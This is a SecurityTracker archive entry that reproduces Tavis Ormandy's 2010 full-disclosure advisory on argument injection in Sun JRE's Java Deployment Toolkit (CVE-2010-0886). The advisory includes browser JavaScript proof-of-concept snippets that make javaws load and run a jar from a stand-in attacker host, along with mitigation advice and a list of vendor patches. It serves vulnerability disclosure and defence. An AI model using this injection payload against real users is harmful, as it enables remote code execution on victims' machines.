SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Java Runtime Environment (JRE) Vendors:   Oracle, Sun
Sun JRE Java Deployment Toolkit Lets Remote Users Inject Arbitrary Commands
SecurityTracker Alert ID:  1023840
SecurityTracker URL:  http://securitytracker.com/id/1023840
CVE Reference:   CVE-2010-0886, CVE-2010-0887   (Links to External Site)
Updated:  Apr 20 2010
Original Entry Date:  Apr 10 2010
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6 Update 19
Description:   A vulnerability was reported in Sun JRE. A remote user can cause arbitrary commands to be executed on the target user's system.

The Java NPAPI plugin and ActiveX control (i.e., Java Deployment Toolkit) passes user-supplied input as command parameters to Java Web Start without filtering or validating the input. A remote user can create a specially crafted URL that, when loaded by the target user, will execute arbitrary commands on the target user's system. The code will run with the privileges of the target user.

The vulnerability affects desktop Java running in 32-bit web browsers. Server-based Java is not affected.

The affected component is included in recent versions of Java Runtime Environment (JRE).

Tavis Ormandy and Ruben Santamarta separately reported this vulnerability.

Impact:   A remote user can create HTML or a URL that, when loaded by the target user, will execute arbitrary commands on the target user's system.
Solution:   The vendor has issued a fix (6 Update 20).

The vendor's advisory is available at:

http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html

Vendor URL:  www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0886.html (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Solaris - SunOS), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Apr 20 2010 (Red Hat Issues Fix) Sun JRE Java Deployment Toolkit Lets Remote Users Inject Arbitrary Commands   (bugzilla@redhat.com)
Red Hat has issued a fix for Red Hat Enterprise Linux 4 Extras and 5 Supplementary.
May 20 2010 (Apple Issues Fix) Sun JRE Java Deployment Toolkit Lets Remote Users Inject Arbitrary Commands   (Apple Product Security <product-security-noreply@lists.apple.com>)
Apple has issued a fix for Java for Mac OS X 10.6.3.
Jul 21 2010 (Red Hat Issues Fix) Sun JRE Java Deployment Toolkit Lets Remote Users Inject Arbitrary Commands   (bugzilla@redhat.com)
Red Hat has issued a fix for java-1.6.0-ibm for Red Hat Enterprise Linux 4 Extras and 5 Supplementary.



 Source Message Contents

Date:  Fri, 9 Apr 2010 13:08:18 +0200
Subject:  [Full-disclosure] Java Deployment Toolkit Performs Insufficient Validation of Parameters

Java Deployment Toolkit Performs Insufficient Validation of Parameters
-------------------------------------------------------------------------

Java Web Start (henceforth, jws) provides java developers with a way to let
users launch and install their applications using a URL to a Java Networking
Launching Protocol (.jnlp) file (essentially some xml describing the
program).

Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control
called "Java Deployment Toolkit" to provide developers with a simpler method
of distributing their applications to end users. This toolkit is installed by
default with the JRE and marked safe for scripting.

The launch() method provided by the toolkit object accepts a URL string, which
it passes to the registered handler for JNLP files, which by default is the
javaws utility.

$ cmd /c ver
Microsoft Windows XP [Version 5.1.2600]

$ java -version
java version "1.6.0_19"
Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)

$ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@
"C:\Program Files\Java\jre6\bin\javaws.exe" "%1"

The toolkit provides only minimal validation of the URL parameter, allowing us
to pass arbitrary parameters to the javaws utility, which provides enough
functionality via command line arguments to allow this error to be exploited.

The simplicity with which this error can be discovered has convinced me
that releasing this document is in the best interest of everyone except
the vendor.

--------------------
Affected Software
------------------------

All versions since Java SE 6 update 10 for Microsoft Windows are believed to be
affected by this vulnerability. Disabling the java plugin is not sufficient to
prevent exploitation, as the toolkit is installed independently.

http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html

I believe non-Windows installations are unaffected.

--------------------
Consequences
-----------------------

Exploitation of this issue is not terribly exciting, but is potentially of high
enough impact to merit explanation. The javaws application supports the
following command line parameters.

$ javaws -help
Usage:  javaws [run-options] <jnlp-file>    
        javaws [control-options]        
                        
where run-options include:          
  -verbose          display additional output   
  -offline          run the application in offline mode 
  -system           run the application from the system cache only
  -Xnosplash        run without showing a splash screen 
  -J<option>        supply option to the vm 
  -wait             start java process and wait for its exit    
    
control-options include:    
  -viewer           show the cache viewer in the java control panel
  -uninstall        remove all applications from the cache
  -uninstall <jnlp-file>                remove the application from the cache   
  -import [import-options] <jnlp-file>  import the application to the cache     
                                    
import-options include:                     
  -silent           import silently (with no user interface)    
  -system           import application into the system cache    
  -codebase <url>   retrieve resources from the given codebase  
  -shortcut         install shortcuts as if user allowed prompt 
  -association      install associations as if user allowed prompt  

Perhaps the most interesting of these is -J, and the obvious attack is simply
to add -jar followed by an attacker controlled UNC path to the jvm command
line, which I've demonstrated below. Other attacks are clearly possible, but
this is sufficient to demonstrate the problem.

In order to trigger this attack in Internet Explorer, an attacker would use a
code sequence like this

/* ... */
var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Or, for Mozilla Firefox

/* ... */
var o = document.createElement("OBJECT");

o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Please note, at some point the registered MIME type was changed to
application/java-deployment-toolkit, please verify which type applies to
your users when verifying any mitigation implemented has been effective (the
simplest way would be to look at the output of about:plugins on a reference
machine).

A harmless demonstration is provided at the URL below.

http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html

-------------------
Mitigation
-----------------------

If you believe your users may be affected, you should consider applying one of
the workarounds described below as a matter of urgency.

- Internet Explorer users can be protected by temporarily setting the killbit
  on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the
  deployment toolkit is not in widespread usage and is unlikely to impact end
  users.

- Mozilla Firefox and other NPAPI based browser users can be protected using
  File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be
  managed via GPO.

Detailed documentation on killbits is provided by Microsoft here

http://support.microsoft.com/kb/240797

Domain administrators can deploy killbits and File System ACLs using GPOs, for
more information on Group Policy, see Microsoft's Group Policy site, here

http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx

You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but
the author does not believe this is sufficient, as the plugin also provides
enough functionality to install and downgrade JRE installations without
prompting (seriously). However, if none of your affected users are local
Administrators, this solution may work (untested).

As always, if you do not require this feature, consider permanently disabling
it in order to reduce attack surface.

-------------------
Solution
-----------------------

Sun has been informed about this vulnerability, however, they informed me they
do not consider this vulnerability to be of high enough priority to break their
quarterly patch cycle.

For various reasons, I explained that I did did not agree, and intended to
publish advice to temporarily disable the affected control until a solution is
available.

-------------------
Credit
-----------------------

This bug was discovered by Tavis Ormandy.

This work is my own, and all of the opinions expressed are mine, not my
employers or anybody elses (I added this for you, Dan. Thanks ;-)).

-------------------
Greetz
-----------------------

Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,
ScaryBeasts, Headhntr, Jagger, Sami and Roach.

Some very elite friends have started a consultancy called inverse path, you
should really hire them.

http://www.inversepath.com/

-------------------
References
-----------------------

- Deploying Java with JNLP, Sun Microsystems.
  http://java.sun.com/developer/technicalArticles/Programming/jnlp/

-------------------
Notes
-----------------------

My advisories are intended to be consumed by a technical audience of security
professionals and systems administrators who are familiar with the principal
for which the mailing list you have subscribed to is named. If you do not fall
into this category, you can get up to speed by reading this accessible and
balanced essay on the disclosure debate by Bruce Schneier.

http://www.schneier.com/crypto-gram-0111.html#1

Some of us would appreciate it if you made the effort to research and
understand the issues involved before condemning us :-)

-- 
-------------------------------------
taviso@sdf.lonestar.org | finger me for my gpg key.
-------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC